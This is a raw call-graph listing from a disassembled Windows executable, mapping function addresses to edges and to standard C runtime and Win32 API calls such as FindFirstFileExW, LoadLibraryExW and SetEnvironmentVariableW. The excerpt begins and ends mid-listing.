7ff6dd65130a __vcrt_freefls 17000->17030 17002 7ff6dd651323 17001->17002 17003 7ff6dd65134d 17002->17003 17004 7ff6dd651327 17002->17004 17007 7ff6dd651368 17003->17007 17008 7ff6dd651390 17003->17008 17005 7ff6dd652890 59 API calls 17004->17005 17006 7ff6dd65133e 17005->17006 17010 7ff6dd66018c 74 API calls 17006->17010 17011 7ff6dd652890 59 API calls 17007->17011 17012 7ff6dd6513aa 17008->17012 17024 7ff6dd651463 17008->17024 17009 7ff6dd65bcc0 _wfindfirst32i64 8 API calls 17013 7ff6dd651454 17009->17013 17010->17030 17015 7ff6dd651383 17011->17015 17016 7ff6dd651050 98 API calls 17012->17016 17013->16873 17013->16877 17014 7ff6dd6513c3 17020 7ff6dd6604dc _fread_nolock 53 API calls 17020->17024 17024->17014 17024->17020 17026 7ff6dd6514bb 17024->17026 17027 7ff6dd652890 59 API calls 17026->17027 17030->17009 17038 7ff6dd653f6a 17037->17038 17039 7ff6dd658ae0 57 API calls 17038->17039 17040 7ff6dd653f92 17039->17040 17041 7ff6dd65bcc0 _wfindfirst32i64 8 API calls 17040->17041 17042 7ff6dd653fba 17041->17042 17042->16963 17042->16965 17042->16973 17134 7ff6dd6531e4 17133->17134 17135 7ff6dd664ac4 49 API calls 17134->17135 17136 7ff6dd65320a 17135->17136 17137 7ff6dd65321b 17136->17137 17193 7ff6dd665dec 17136->17193 17142 7ff6dd6575ae 17141->17142 17459 7ff6dd6663dc 17456->17459 17457 7ff6dd666402 17458 7ff6dd6654c4 _findclose 11 API calls 17457->17458 17460 7ff6dd666407 17458->17460 17459->17457 17461 7ff6dd666435 17459->17461 17462 7ff6dd66aea4 _invalid_parameter_noinfo 37 API calls 17460->17462 17463 7ff6dd66643b 17461->17463 17464 7ff6dd666448 17461->17464 17465 7ff6dd654029 17462->17465 17466 7ff6dd6654c4 _findclose 11 API calls 17463->17466 17475 7ff6dd66b1ec 17464->17475 17465->15681 17466->17465 17488 7ff6dd670cb8 EnterCriticalSection 17475->17488 17836 7ff6dd6690a0 17835->17836 17839 7ff6dd668b7c 17836->17839 17862 7ff6dd653fd0 116 API calls 17861->17862 17863 7ff6dd6515c7 17862->17863 17864 7ff6dd6515cf 17863->17864 17865 7ff6dd6515f0 17863->17865 17866 7ff6dd652b30 59 API calls 17864->17866 17867 7ff6dd660814 73 API calls 17865->17867 17868 7ff6dd6515df 17866->17868 17869 7ff6dd651601 17867->17869 17868->15700 17870 7ff6dd651605 17869->17870 17871 7ff6dd651621 17869->17871 17872 7ff6dd652890 59 API calls 17870->17872 17873 7ff6dd651651 17871->17873 17874 7ff6dd651631 17871->17874 17883 7ff6dd65161c __vcrt_freefls 17872->17883 17876 7ff6dd651666 17873->17876 17881 7ff6dd65167d 17873->17881 17875 7ff6dd652890 59 API calls 17874->17875 17875->17883 17878 7ff6dd651050 98 API calls 17876->17878 17877 7ff6dd66018c 74 API calls 17879 7ff6dd6516f7 17877->17879 17878->17883 17879->15700 17880 7ff6dd6604dc _fread_nolock 53 API calls 17880->17881 17881->17880 17882 7ff6dd6516be 17881->17882 17881->17883 17884 7ff6dd652890 59 API calls 17882->17884 17883->17877 17884->17883 17887 7ff6dd6519d3 17885->17887 17888 7ff6dd65196f 17885->17888 17886 7ff6dd665070 45 API calls 17886->17888 17887->15711 17888->17886 17888->17887 17890 7ff6dd658ae0 57 API calls 17889->17890 17891 7ff6dd658277 LoadLibraryExW 17890->17891 17892 7ff6dd658294 __vcrt_freefls 17891->17892 17892->15727 17953 7ff6dd655bd0 17952->17953 17954 7ff6dd651ef0 49 API calls 17953->17954 17955 7ff6dd655c02 17954->17955 17956 7ff6dd655c2b 17955->17956 17957 7ff6dd655c0b 17955->17957 17959 7ff6dd655c82 17956->17959 17960 7ff6dd654050 49 API calls 17956->17960 17958 7ff6dd652b30 59 API calls 17957->17958 17979 7ff6dd655c21 17958->17979 17961 7ff6dd654050 49 API calls 17959->17961 17962 7ff6dd655c4c 17960->17962 17963 7ff6dd655c9b 17961->17963 17964 7ff6dd655c6a 17962->17964 17967 7ff6dd652b30 59 API calls 17962->17967 17966 7ff6dd655cb9 17963->17966 17970 7ff6dd652b30 59 API calls 17963->17970 17968 7ff6dd653f60 57 API calls 17964->17968 17965 7ff6dd65bcc0 _wfindfirst32i64 8 API calls 17969 7ff6dd65346e 17965->17969 17971 7ff6dd658260 58 API calls 17966->17971 17967->17964 17973 7ff6dd655c74 17968->17973 17969->15748 17980 7ff6dd655d20 17969->17980 17970->17966 17972 7ff6dd655cc6 17971->17972 17974 7ff6dd655ccb 17972->17974 17975 7ff6dd655ced 17972->17975 17973->17959 17978 7ff6dd658260 58 API calls 17973->17978 17976 7ff6dd6529e0 57 API calls 17974->17976 18050 7ff6dd6551e0 GetProcAddress 17975->18050 17976->17979 17978->17959 17979->17965 18134 7ff6dd654de0 17980->18134 17982 7ff6dd655d44 18051 7ff6dd655202 18050->18051 18052 7ff6dd655220 GetProcAddress 18050->18052 18055 7ff6dd6529e0 57 API calls 18051->18055 18052->18051 18053 7ff6dd655245 GetProcAddress 18052->18053 18053->18051 18136 7ff6dd654e05 18134->18136 18135 7ff6dd654e0d 18135->17982 18136->18135 18139 7ff6dd654f9f 18136->18139 18176 7ff6dd666fb8 18136->18176 18137 7ff6dd65514a __vcrt_freefls 18137->17982 18138 7ff6dd654250 47 API calls 18138->18139 18139->18137 18139->18138 18177 7ff6dd666fe8 18176->18177 18180 7ff6dd6664b4 18177->18180 18276 7ff6dd66b710 __CxxCallCatchBlock 45 API calls 18275->18276 18277 7ff6dd66a971 18276->18277 18278 7ff6dd66aa9c __CxxCallCatchBlock 45 API calls 18277->18278 18279 7ff6dd66a991 18278->18279 15173 7ff6dd66fcec 15174 7ff6dd66fede 15173->15174 15176 7ff6dd66fd2e _isindst 15173->15176 15226 7ff6dd6654c4 15174->15226 15176->15174 15179 7ff6dd66fdae _isindst 15176->15179 15194 7ff6dd676904 15179->15194 15184 7ff6dd66ff0a 15238 7ff6dd66aec4 IsProcessorFeaturePresent 15184->15238 15191 7ff6dd66fe0b 15193 7ff6dd66fece 15191->15193 15219 7ff6dd676948 15191->15219 15229 7ff6dd65bcc0 15193->15229 15195 7ff6dd676913 15194->15195 15196 7ff6dd66fdcc 15194->15196 15242 7ff6dd670cb8 EnterCriticalSection 15195->15242 15201 7ff6dd675d08 15196->15201 15202 7ff6dd66fde1 15201->15202 15203 7ff6dd675d11 15201->15203 15202->15184 15207 7ff6dd675d38 15202->15207 15204 7ff6dd6654c4 _findclose 11 API calls 15203->15204 15205 7ff6dd675d16 15204->15205 15243 7ff6dd66aea4 15205->15243 15208 7ff6dd66fdf2 15207->15208 15209 7ff6dd675d41 15207->15209 15208->15184 15213 7ff6dd675d68 15208->15213 15210 7ff6dd6654c4 _findclose 11 API calls 15209->15210 15211 7ff6dd675d46 15210->15211 15212 7ff6dd66aea4 _invalid_parameter_noinfo 37 API calls 15211->15212 15212->15208 15214 7ff6dd675d71 15213->15214 15216 7ff6dd66fe03 15213->15216 15215 7ff6dd6654c4 _findclose 11 API calls 15214->15215 15217 7ff6dd675d76 15215->15217 15216->15184 15216->15191 15218 7ff6dd66aea4 _invalid_parameter_noinfo 37 API calls 15217->15218 15218->15216 15324 7ff6dd670cb8 EnterCriticalSection 15219->15324 15325 7ff6dd66b888 GetLastError 15226->15325 15228 7ff6dd6654cd 15228->15193 15230 7ff6dd65bcc9 15229->15230 15231 7ff6dd65bcd4 15230->15231 15232 7ff6dd65bd20 IsProcessorFeaturePresent 15230->15232 15233 7ff6dd65bd38 15232->15233 15342 7ff6dd65bf14 RtlCaptureContext 15233->15342 15239 7ff6dd66aed7 15238->15239 15347 7ff6dd66abd8 15239->15347 15245 7ff6dd66ad3c 15243->15245 15246 7ff6dd66ad67 15245->15246 15249 7ff6dd66add8 15246->15249 15248 7ff6dd66ad8e 15257 7ff6dd66ab20 15249->15257 15252 7ff6dd66ae13 15252->15248 15255 7ff6dd66aec4 _wfindfirst32i64 17 API calls 15256 7ff6dd66aea3 15255->15256 15258 7ff6dd66ab3c GetLastError 15257->15258 15259 7ff6dd66ab77 15257->15259 15260 7ff6dd66ab4c 15258->15260 15259->15252 15263 7ff6dd66ab8c 15259->15263 15266 7ff6dd66b950 15260->15266 15264 7ff6dd66aba8 GetLastError SetLastError 15263->15264 15265 7ff6dd66abc0 15263->15265 15264->15265 15265->15252 15265->15255 15267 7ff6dd66b98a FlsSetValue 15266->15267 15268 7ff6dd66b96f FlsGetValue 15266->15268 15269 7ff6dd66b997 15267->15269 15272 7ff6dd66ab67 SetLastError 15267->15272 15270 7ff6dd66b984 15268->15270 15268->15272 15283 7ff6dd66f158 15269->15283 15270->15267 15272->15259 15274 7ff6dd66b9c4 FlsSetValue 15277 7ff6dd66b9e2 15274->15277 15278 7ff6dd66b9d0 FlsSetValue 15274->15278 15275 7ff6dd66b9b4 FlsSetValue 15276 7ff6dd66b9bd 15275->15276 15290 7ff6dd66af0c 15276->15290 15296 7ff6dd66b4b8 15277->15296 15278->15276 15288 7ff6dd66f169 _findclose 15283->15288 15284 7ff6dd66f1ba 15286 7ff6dd6654c4 _findclose 10 API calls 15284->15286 15285 7ff6dd66f19e RtlAllocateHeap 15287 7ff6dd66b9a6 15285->15287 15285->15288 15286->15287 15287->15274 15287->15275 15288->15284 15288->15285 15301 7ff6dd673c00 15288->15301 15291 7ff6dd66af40 15290->15291 15292 7ff6dd66af11 RtlRestoreThreadPreferredUILanguages 15290->15292 15291->15272 15292->15291 15293 7ff6dd66af2c GetLastError 15292->15293 15294 7ff6dd66af39 __free_lconv_num 15293->15294 15295 7ff6dd6654c4 _findclose 9 API calls 15294->15295 15295->15291 15310 7ff6dd66b390 15296->15310 15304 7ff6dd673c40 15301->15304 15309 7ff6dd670cb8 EnterCriticalSection 15304->15309 15322 7ff6dd670cb8 EnterCriticalSection 15310->15322 15326 7ff6dd66b8c9 FlsSetValue 15325->15326 15328 7ff6dd66b8ac 15325->15328 15327 7ff6dd66b8db 15326->15327 15340 7ff6dd66b8b9 15326->15340 15330 7ff6dd66f158 _findclose 5 API calls 15327->15330 15328->15326 15328->15340 15329 7ff6dd66b935 SetLastError 15329->15228 15331 7ff6dd66b8ea 15330->15331 15332 7ff6dd66b908 FlsSetValue 15331->15332 15333 7ff6dd66b8f8 FlsSetValue 15331->15333 15334 7ff6dd66b926 15332->15334 15335 7ff6dd66b914 FlsSetValue 15332->15335 15336 7ff6dd66b901 15333->15336 15337 7ff6dd66b4b8 _findclose 5 API calls 15334->15337 15335->15336 15338 7ff6dd66af0c __free_lconv_num 5 API calls 15336->15338 15339 7ff6dd66b92e 15337->15339 15338->15340 15341 7ff6dd66af0c __free_lconv_num 5 API calls 15339->15341 15340->15329 15341->15329 15343 7ff6dd65bf2e RtlLookupFunctionEntry 15342->15343 15344 7ff6dd65bd4b 15343->15344 15345 7ff6dd65bf44 RtlVirtualUnwind 15343->15345 15346 7ff6dd65bce0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 15344->15346 15345->15343 15345->15344 15348 7ff6dd66ac12 _wfindfirst32i64 memcpy_s 15347->15348 15349 7ff6dd66ac3a RtlCaptureContext RtlLookupFunctionEntry 15348->15349 15350 7ff6dd66acaa IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 15349->15350 15351 7ff6dd66ac74 RtlVirtualUnwind 15349->15351 15352 7ff6dd66acfc _wfindfirst32i64 15350->15352 15351->15350 15353 7ff6dd65bcc0 _wfindfirst32i64 8 API calls 15352->15353 15354 7ff6dd66ad1b GetCurrentProcess TerminateProcess 15353->15354 19774 7ff6dd67aaf4 19777 7ff6dd665378 LeaveCriticalSection 19774->19777 18347 7ff6dd669ef1 18348 7ff6dd66a968 45 API calls 18347->18348 18349 7ff6dd669ef6 18348->18349 18350 7ff6dd669f1d GetModuleHandleW 18349->18350 18351 7ff6dd669f67 18349->18351 18350->18351 18357 7ff6dd669f2a 18350->18357 18359 7ff6dd669df4 18351->18359 18357->18351 18373 7ff6dd66a018 GetModuleHandleExW 18357->18373 18379 7ff6dd670cb8 EnterCriticalSection 18359->18379 18374 7ff6dd66a04c GetProcAddress 18373->18374 18375 7ff6dd66a075 18373->18375 18376 7ff6dd66a05e 18374->18376 18377 7ff6dd66a07a FreeLibrary 18375->18377 18378 7ff6dd66a081 18375->18378 18376->18375 18377->18378 18378->18351 18712 7ff6dd67a96e 18713 7ff6dd67a97e 18712->18713 18716 7ff6dd665378 LeaveCriticalSection 18713->18716 19850 7ff6dd66a2e0 19853 7ff6dd66a25c 19850->19853 19860 7ff6dd670cb8 EnterCriticalSection 19853->19860 19861 7ff6dd66cae0 19872 7ff6dd670cb8 EnterCriticalSection 19861->19872 18280 7ff6dd667e4c 18281 7ff6dd667e7a 18280->18281 18282 7ff6dd667eb3 18280->18282 18283 7ff6dd6654c4 _findclose 11 API calls 18281->18283 18282->18281 18284 7ff6dd667eb8 FindFirstFileExW 18282->18284 18285 7ff6dd667e7f 18283->18285 18286 7ff6dd667eda GetLastError 18284->18286 18287 7ff6dd667f21 18284->18287 18288 7ff6dd66aea4 _invalid_parameter_noinfo 37 API calls 18285->18288 18290 7ff6dd667f11 18286->18290 18293 7ff6dd667ee5 18286->18293 18340 7ff6dd6680bc 18287->18340 18296 7ff6dd667e8a 18288->18296 18291 7ff6dd6654c4 _findclose 11 API calls 18290->18291 18291->18296 18293->18290 18294 7ff6dd667eef 18293->18294 18295 7ff6dd667f01 18293->18295 18294->18290 18298 7ff6dd667ef4 18294->18298 18299 7ff6dd6654c4 _findclose 11 API calls 18295->18299 18300 7ff6dd65bcc0 _wfindfirst32i64 8 API calls 18296->18300 18297 7ff6dd6680bc _wfindfirst32i64 10 API calls 18301 7ff6dd667f47 18297->18301 18302 7ff6dd6654c4 _findclose 11 API calls 18298->18302 18299->18296 18303 7ff6dd667e9e 18300->18303 18304 7ff6dd6680bc _wfindfirst32i64 10 API calls 18301->18304 18302->18296 18305 7ff6dd667f55 18304->18305 18306 7ff6dd670e54 _wfindfirst32i64 37 API calls 18305->18306 18307 7ff6dd667f73 18306->18307 18307->18296 18308 7ff6dd667f7f 18307->18308 18309 7ff6dd66aec4 _wfindfirst32i64 17 API calls 18308->18309 18310 7ff6dd667f93 18309->18310 18311 7ff6dd667fbd 18310->18311 18313 7ff6dd667ffc FindNextFileW 18310->18313 18312 7ff6dd6654c4 _findclose 11 API calls 18311->18312 18314 7ff6dd667fc2 18312->18314 18315 7ff6dd66800b GetLastError 18313->18315 18316 7ff6dd66804c 18313->18316 18317 7ff6dd66aea4 _invalid_parameter_noinfo 37 API calls 18314->18317 18319 7ff6dd668016 18315->18319 18320 7ff6dd66803f 18315->18320 18318 7ff6dd6680bc _wfindfirst32i64 10 API calls 18316->18318 18321 7ff6dd667fcd 18317->18321 18322 7ff6dd668064 18318->18322 18319->18320 18325 7ff6dd668032 18319->18325 18326 7ff6dd668020 18319->18326 18323 7ff6dd6654c4 _findclose 11 API calls 18320->18323 18327 7ff6dd65bcc0 _wfindfirst32i64 8 API calls 18321->18327 18324 7ff6dd6680bc _wfindfirst32i64 10 API calls 18322->18324 18323->18321 18328 7ff6dd668072 18324->18328 18330 7ff6dd6654c4 _findclose 11 API calls 18325->18330 18326->18320 18329 7ff6dd668025 18326->18329 18331 7ff6dd667fe0 18327->18331 18332 7ff6dd6680bc _wfindfirst32i64 10 API calls 18328->18332 18333 7ff6dd6654c4 _findclose 11 API calls 18329->18333 18330->18321 18334 7ff6dd668080 18332->18334 18333->18321 18335 7ff6dd670e54 _wfindfirst32i64 37 API calls 18334->18335 18336 7ff6dd66809e 18335->18336 18336->18321 18337 7ff6dd6680a6 18336->18337 18338 7ff6dd66aec4 _wfindfirst32i64 17 API calls 18337->18338 18339 7ff6dd6680ba 18338->18339 18341 7ff6dd6680da FileTimeToSystemTime 18340->18341 18342 7ff6dd6680d4 18340->18342 18343 7ff6dd6680e9 SystemTimeToTzSpecificLocalTime 18341->18343 18344 7ff6dd6680ff 18341->18344 18342->18341 18342->18344 18343->18344 18345 7ff6dd65bcc0 _wfindfirst32i64 8 API calls 18344->18345 18346 7ff6dd667f39 18345->18346 18346->18297 18734 7ff6dd670f38 18735 7ff6dd670f5c 18734->18735 18738 7ff6dd670f6c 18734->18738 18736 7ff6dd6654c4 _findclose 11 API calls 18735->18736 18756 7ff6dd670f61 18736->18756 18737 7ff6dd67124c 18740 7ff6dd6654c4 _findclose 11 API calls 18737->18740 18738->18737 18739 7ff6dd670f8e 18738->18739 18741 7ff6dd670faf 18739->18741 18865 7ff6dd6715f4 18739->18865 18742 7ff6dd671251 18740->18742 18745 7ff6dd671021 18741->18745 18747 7ff6dd670fd5 18741->18747 18752 7ff6dd671015 18741->18752 18744 7ff6dd66af0c __free_lconv_num 11 API calls 18742->18744 18744->18756 18749 7ff6dd66f158 _findclose 11 API calls 18745->18749 18766 7ff6dd670fe4 18745->18766 18746 7ff6dd6710ce 18755 7ff6dd6710eb 18746->18755 18763 7ff6dd67113d 18746->18763 18880 7ff6dd669c50 18747->18880 18753 7ff6dd671037 18749->18753 18751 7ff6dd66af0c __free_lconv_num 11 API calls 18751->18756 18752->18746 18752->18766 18886 7ff6dd6779fc 18752->18886 18757 7ff6dd66af0c __free_lconv_num 11 API calls 18753->18757 18760 7ff6dd66af0c __free_lconv_num 11 API calls 18755->18760 18761 7ff6dd671045 18757->18761 18758 7ff6dd670ffd 18758->18752 18765 7ff6dd6715f4 45 API calls 18758->18765 18759 7ff6dd670fdf 18762 7ff6dd6654c4 _findclose 11 API calls 18759->18762 18764 7ff6dd6710f4 18760->18764 18761->18752 18761->18766 18768 7ff6dd66f158 _findclose 11 API calls 18761->18768 18762->18766 18763->18766 18767 7ff6dd673a4c 40 API calls 18763->18767 18775 7ff6dd6710f9 18764->18775 18922 7ff6dd673a4c 18764->18922 18765->18752 18766->18751 18769 7ff6dd67117a 18767->18769 18770 7ff6dd671067 18768->18770 18771 7ff6dd66af0c __free_lconv_num 11 API calls 18769->18771 18773 7ff6dd66af0c __free_lconv_num 11 API calls 18770->18773 18774 7ff6dd671184 18771->18774 18773->18752 18774->18766 18774->18775 18776 7ff6dd671240 18775->18776 18780 7ff6dd66f158 _findclose 11 API calls 18775->18780 18778 7ff6dd66af0c __free_lconv_num 11 API calls 18776->18778 18777 7ff6dd671125 18779 7ff6dd66af0c __free_lconv_num 11 API calls 18777->18779 18778->18756 18779->18775 18781 7ff6dd6711c8 18780->18781 18782 7ff6dd6711d9 18781->18782 18783 7ff6dd6711d0 18781->18783 18785 7ff6dd66aa3c __std_exception_copy 37 API calls 18782->18785 18784 7ff6dd66af0c __free_lconv_num 11 API calls 18783->18784 18786 7ff6dd6711d7 18784->18786 18787 7ff6dd6711e8 18785->18787 18792 7ff6dd66af0c __free_lconv_num 11 API calls 18786->18792 18788 7ff6dd67127b 18787->18788 18789 7ff6dd6711f0 18787->18789 18791 7ff6dd66aec4 _wfindfirst32i64 17 API calls 18788->18791 18931 7ff6dd677b14 18789->18931 18794 7ff6dd67128f 18791->18794 18792->18756 18797 7ff6dd6712b8 18794->18797 18803 7ff6dd6712c8 18794->18803 18795 7ff6dd671238 18798 7ff6dd66af0c __free_lconv_num 11 API calls 18795->18798 18796 7ff6dd671217 18799 7ff6dd6654c4 _findclose 11 API calls 18796->18799 18800 7ff6dd6654c4 _findclose 11 API calls 18797->18800 18798->18776 18801 7ff6dd67121c 18799->18801 18824 7ff6dd6712bd 18800->18824 18804 7ff6dd66af0c __free_lconv_num 11 API calls 18801->18804 18802 7ff6dd6715ab 18806 7ff6dd6654c4 _findclose 11 API calls 18802->18806 18803->18802 18805 7ff6dd6712ea 18803->18805 18804->18786 18807 7ff6dd671307 18805->18807 18950 7ff6dd6716dc 18805->18950 18808 7ff6dd6715b0 18806->18808 18811 7ff6dd67137b 18807->18811 18813 7ff6dd67132f 18807->18813 18819 7ff6dd67136f 18807->18819 18810 7ff6dd66af0c __free_lconv_num 11 API calls 18808->18810 18810->18824 18815 7ff6dd6713a3 18811->18815 18820 7ff6dd66f158 _findclose 11 API calls 18811->18820 18832 7ff6dd67133e 18811->18832 18812 7ff6dd67142e 18822 7ff6dd67144b 18812->18822 18833 7ff6dd67149e 18812->18833 18965 7ff6dd669c8c 18813->18965 18817 7ff6dd66f158 _findclose 11 API calls 18815->18817 18815->18819 18815->18832 18823 7ff6dd6713c5 18817->18823 18818 7ff6dd66af0c __free_lconv_num 11 API calls 18818->18824 18819->18812 18819->18832 18971 7ff6dd6778bc 18819->18971 18825 7ff6dd671395 18820->18825 18829 7ff6dd66af0c __free_lconv_num 11 API calls 18822->18829 18830 7ff6dd66af0c __free_lconv_num 11 API calls 18823->18830 18831 7ff6dd66af0c __free_lconv_num 11 API calls 18825->18831 18826 7ff6dd671339 18828 7ff6dd6654c4 _findclose 11 API calls 18826->18828 18827 7ff6dd671357 18827->18819 18835 7ff6dd6716dc 45 API calls 18827->18835 18828->18832 18834 7ff6dd671454 18829->18834 18830->18819 18831->18815 18832->18818 18833->18832 18836 7ff6dd673a4c 40 API calls 18833->18836 18839 7ff6dd673a4c 40 API calls 18834->18839 18841 7ff6dd67145a 18834->18841 18835->18819 18837 7ff6dd6714dc 18836->18837 18838 7ff6dd66af0c __free_lconv_num 11 API calls 18837->18838 18840 7ff6dd6714e6 18838->18840 18843 7ff6dd671486 18839->18843 18840->18832 18840->18841 18842 7ff6dd67159f 18841->18842 18846 7ff6dd66f158 _findclose 11 API calls 18841->18846 18844 7ff6dd66af0c __free_lconv_num 11 API calls 18842->18844 18845 7ff6dd66af0c __free_lconv_num 11 API calls 18843->18845 18844->18824 18845->18841 18847 7ff6dd67152b 18846->18847 18848 7ff6dd67153c 18847->18848 18849 7ff6dd671533 18847->18849 18851 7ff6dd670e54 _wfindfirst32i64 37 API calls 18848->18851 18850 7ff6dd66af0c __free_lconv_num 11 API calls 18849->18850 18852 7ff6dd67153a 18850->18852 18853 7ff6dd67154a 18851->18853 18859 7ff6dd66af0c __free_lconv_num 11 API calls 18852->18859 18854 7ff6dd671552 SetEnvironmentVariableW 18853->18854 18855 7ff6dd6715df 18853->18855 18856 7ff6dd671576 18854->18856 18857 7ff6dd671597 18854->18857 18858 7ff6dd66aec4 _wfindfirst32i64 17 API calls 18855->18858 18861 7ff6dd6654c4 _findclose 11 API calls 18856->18861 18860 7ff6dd66af0c __free_lconv_num 11 API calls 18857->18860 18862 7ff6dd6715f3 18858->18862 18859->18824 18860->18842 18863 7ff6dd67157b 18861->18863 18864 7ff6dd66af0c __free_lconv_num 11 API calls 18863->18864 18864->18852 18866 7ff6dd671629 18865->18866 18873 7ff6dd671611 18865->18873 18867 7ff6dd66f158 _findclose 11 API calls 18866->18867 18875 7ff6dd67164d 18867->18875 18868 7ff6dd6716d2 18870 7ff6dd66aa9c __CxxCallCatchBlock 45 API calls 18868->18870 18869 7ff6dd6716ae 18872 7ff6dd66af0c __free_lconv_num 11 API calls 18869->18872 18871 7ff6dd6716d8 18870->18871 18872->18873 18873->18741 18874 7ff6dd66f158 _findclose 11 API calls 18874->18875 18875->18868 18875->18869 18875->18874 18876 7ff6dd66af0c __free_lconv_num 11 API calls 18875->18876 18877 7ff6dd66aa3c __std_exception_copy 37 API calls 18875->18877 18878 7ff6dd6716bd 18875->18878 18876->18875 18877->18875 18879 7ff6dd66aec4 _wfindfirst32i64 17 API calls 18878->18879 18879->18868 18881 7ff6dd669c60 18880->18881 18885 7ff6dd669c69 18880->18885 18881->18885 18995 7ff6dd669728 18881->18995 18885->18758 18885->18759 18887 7ff6dd676bac 18886->18887 18888 7ff6dd677a09 18886->18888 18889 7ff6dd676bb9 18887->18889 18894 7ff6dd676bef 18887->18894 18890 7ff6dd664f98 45 API calls 18888->18890 18891 7ff6dd6654c4 _findclose 11 API calls 18889->18891 18908 7ff6dd676b60 18889->18908 18899 7ff6dd677a3d 18890->18899 18895 7ff6dd676bc3 18891->18895 18892 7ff6dd676c19 18893 7ff6dd6654c4 _findclose 11 API calls 18892->18893 18896 7ff6dd676c1e 18893->18896 18894->18892 18903 7ff6dd676c3e 18894->18903 18900 7ff6dd66aea4 _invalid_parameter_noinfo 37 API calls 18895->18900 18902 7ff6dd66aea4 _invalid_parameter_noinfo 37 API calls 18896->18902 18897 7ff6dd677a42 18897->18752 18898 7ff6dd677a53 18905 7ff6dd6654c4 _findclose 11 API calls 18898->18905 18899->18897 18899->18898 18904 7ff6dd677a6a 18899->18904 18901 7ff6dd676bce 18900->18901 18901->18752 18915 7ff6dd676c29 18902->18915 18909 7ff6dd664f98 45 API calls 18903->18909 18903->18915 18906 7ff6dd677a86 18904->18906 18907 7ff6dd677a74 18904->18907 18910 7ff6dd677a58 18905->18910 18913 7ff6dd677a97 18906->18913 18914 7ff6dd677aae 18906->18914 18912 7ff6dd6654c4 _findclose 11 API calls 18907->18912 18908->18752 18909->18915 18911 7ff6dd66aea4 _invalid_parameter_noinfo 37 API calls 18910->18911 18911->18897 18916 7ff6dd677a79 18912->18916 19218 7ff6dd676bfc 18913->19218 19227 7ff6dd679824 18914->19227 18915->18752 18919 7ff6dd66aea4 _invalid_parameter_noinfo 37 API calls 18916->18919 18919->18897 18921 7ff6dd6654c4 _findclose 11 API calls 18921->18897 18923 7ff6dd673a8b 18922->18923 18924 7ff6dd673a6e 18922->18924 18926 7ff6dd673a95 18923->18926 19267 7ff6dd678508 18923->19267 18924->18923 18925 7ff6dd673a7c 18924->18925 18927 7ff6dd6654c4 _findclose 11 API calls 18925->18927 19274 7ff6dd670ebc 18926->19274 18930 7ff6dd673a81 memcpy_s 18927->18930 18930->18777 18932 7ff6dd664f98 45 API calls 18931->18932 18933 7ff6dd677b7a 18932->18933 18934 7ff6dd66f3e4 5 API calls 18933->18934 18935 7ff6dd677b88 18933->18935 18934->18935 18936 7ff6dd665584 14 API calls 18935->18936 18937 7ff6dd677be4 18936->18937 18938 7ff6dd677c74 18937->18938 18939 7ff6dd664f98 45 API calls 18937->18939 18941 7ff6dd677c85 18938->18941 18942 7ff6dd66af0c __free_lconv_num 11 API calls 18938->18942 18940 7ff6dd677bf7 18939->18940 18944 7ff6dd66f3e4 5 API calls 18940->18944 18948 7ff6dd677c00 18940->18948 18943 7ff6dd671213 18941->18943 18945 7ff6dd66af0c __free_lconv_num 11 API calls 18941->18945 18942->18941 18943->18795 18943->18796 18944->18948 18945->18943 18946 7ff6dd665584 14 API calls 18947 7ff6dd677c5b 18946->18947 18947->18938 18949 7ff6dd677c63 SetEnvironmentVariableW 18947->18949 18948->18946 18949->18938 18951 7ff6dd67171c 18950->18951 18957 7ff6dd6716ff 18950->18957 18952 7ff6dd66f158 _findclose 11 API calls 18951->18952 18960 7ff6dd671740 18952->18960 18953 7ff6dd66aa9c __CxxCallCatchBlock 45 API calls 18955 7ff6dd6717ca 18953->18955 18954 7ff6dd6717a1 18956 7ff6dd66af0c __free_lconv_num 11 API calls 18954->18956 18956->18957 18957->18807 18958 7ff6dd66f158 _findclose 11 API calls 18958->18960 18959 7ff6dd66af0c __free_lconv_num 11 API calls 18959->18960 18960->18954 18960->18958 18960->18959 18961 7ff6dd670e54 _wfindfirst32i64 37 API calls 18960->18961 18962 7ff6dd6717b0 18960->18962 18964 7ff6dd6717c4 18960->18964 18961->18960 18963 7ff6dd66aec4 _wfindfirst32i64 17 API calls 18962->18963 18963->18964 18964->18953 18966 7ff6dd669c9c 18965->18966 18969 7ff6dd669ca5 18965->18969 18966->18969 19286 7ff6dd66979c 18966->19286 18969->18826 18969->18827 18972 7ff6dd6778c9 18971->18972 18974 7ff6dd6778f6 18971->18974 18973 7ff6dd6778ce 18972->18973 18972->18974 18975 7ff6dd6654c4 _findclose 11 API calls 18973->18975 18976 7ff6dd67793a 18974->18976 18979 7ff6dd677959 18974->18979 18993 7ff6dd67792e __crtLCMapStringW 18974->18993 18977 7ff6dd6778d3 18975->18977 18978 7ff6dd6654c4 _findclose 11 API calls 18976->18978 18980 7ff6dd66aea4 _invalid_parameter_noinfo 37 API calls 18977->18980 18981 7ff6dd67793f 18978->18981 18982 7ff6dd677975 18979->18982 18983 7ff6dd677963 18979->18983 18984 7ff6dd6778de 18980->18984 18986 7ff6dd66aea4 _invalid_parameter_noinfo 37 API calls 18981->18986 18985 7ff6dd664f98 45 API calls 18982->18985 18987 7ff6dd6654c4 _findclose 11 API calls 18983->18987 18984->18819 18988 7ff6dd677982 18985->18988 18986->18993 18989 7ff6dd677968 18987->18989 18988->18993 19333 7ff6dd6793e0 18988->19333 18990 7ff6dd66aea4 _invalid_parameter_noinfo 37 API calls 18989->18990 18990->18993 18993->18819 18994 7ff6dd6654c4 _findclose 11 API calls 18994->18993 18996 7ff6dd66973d 18995->18996 18997 7ff6dd669741 18995->18997 18996->18885 19010 7ff6dd669a7c 18996->19010 19018 7ff6dd672c60 18997->19018 19002 7ff6dd669753 19005 7ff6dd66af0c __free_lconv_num 11 API calls 19002->19005 19003 7ff6dd66975f 19044 7ff6dd66980c 19003->19044 19005->18996 19007 7ff6dd66af0c __free_lconv_num 11 API calls 19008 7ff6dd669786 19007->19008 19009 7ff6dd66af0c __free_lconv_num 11 API calls 19008->19009 19009->18996 19011 7ff6dd669aa5 19010->19011 19013 7ff6dd669abe 19010->19013 19011->18885 19012 7ff6dd6704c8 WideCharToMultiByte 19012->19013 19013->19011 19013->19012 19014 7ff6dd66f158 _findclose 11 API calls 19013->19014 19015 7ff6dd669b4e 19013->19015 19017 7ff6dd66af0c __free_lconv_num 11 API calls 19013->19017 19014->19013 19016 7ff6dd66af0c __free_lconv_num 11 API calls 19015->19016 19016->19011 19017->19013 19019 7ff6dd672c6d 